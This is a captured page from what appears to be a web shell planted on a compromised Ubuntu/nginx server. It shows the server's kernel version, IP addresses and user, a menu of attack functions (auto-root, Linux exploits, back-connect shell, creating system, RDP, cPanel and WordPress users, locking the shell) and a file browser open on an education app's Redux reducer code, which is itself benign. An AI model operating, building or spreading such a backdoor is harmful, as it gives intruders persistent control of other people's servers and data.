Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
edu-lms /
app /
edusewa /
reducers /
[ HOME SHELL ]
Name
Size
Permission
Action
chat.js
629
B
-rw-r--r--
consumers.js
2.58
KB
-rw-r--r--
files.js
1.7
KB
-rw-r--r--
helper.js
156
B
-rw-r--r--
lobbyPeers.js
1.25
KB
-rw-r--r--
me.js
3.14
KB
-rw-r--r--
notifications.js
479
B
-rw-r--r--
peerVolumes.js
729
B
-rw-r--r--
peers.js
3.32
KB
-rw-r--r--
producers.js
1.59
KB
-rw-r--r--
room.js
6.66
KB
-rw-r--r--
rootReducer.js
672
B
-rw-r--r--
settings.js
4.77
KB
-rw-r--r--
toolarea.js
1.67
KB
-rw-r--r--
transports.js
301
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : files.js
const files = (state = {}, action) => { switch (action.type) { case 'ADD_FILE': { const { peerId, magnetUri } = action.payload; const newFile = { active : false, progress : 0, files : null, peerId : peerId, magnetUri : magnetUri }; return { ...state, [magnetUri]: newFile }; } case 'ADD_FILE_HISTORY': { const { fileHistory } = action.payload; const newFileHistory = {}; // eslint-disable-next-line fileHistory.map((file) => { const newFile = { active : false, progress : 0, files : null, ...file }; newFileHistory[file.magnetUri] = newFile; }); return { ...state, ...newFileHistory }; } case 'SET_FILE_ACTIVE': { const { magnetUri } = action.payload; const file = state[magnetUri]; const newFile = { ...file, active: true }; return { ...state, [magnetUri]: newFile }; } case 'SET_FILE_INACTIVE': { const { magnetUri } = action.payload; const file = state[magnetUri]; const newFile = { ...file, active: false }; return { ...state, [magnetUri]: newFile }; } case 'SET_FILE_PROGRESS': { const { magnetUri, progress } = action.payload; const file = state[magnetUri]; const newFile = { ...file, progress: progress }; return { ...state, [magnetUri]: newFile }; } case 'SET_FILE_DONE': { const { magnetUri, sharedFiles } = action.payload; const file = state[magnetUri]; const newFile = { ...file, files : sharedFiles, progress : 1, active : false, timeout : false }; return { ...state, [magnetUri]: newFile }; } case 'CLEAR_FILES': return {}; default: return state; } }; export default files;
Close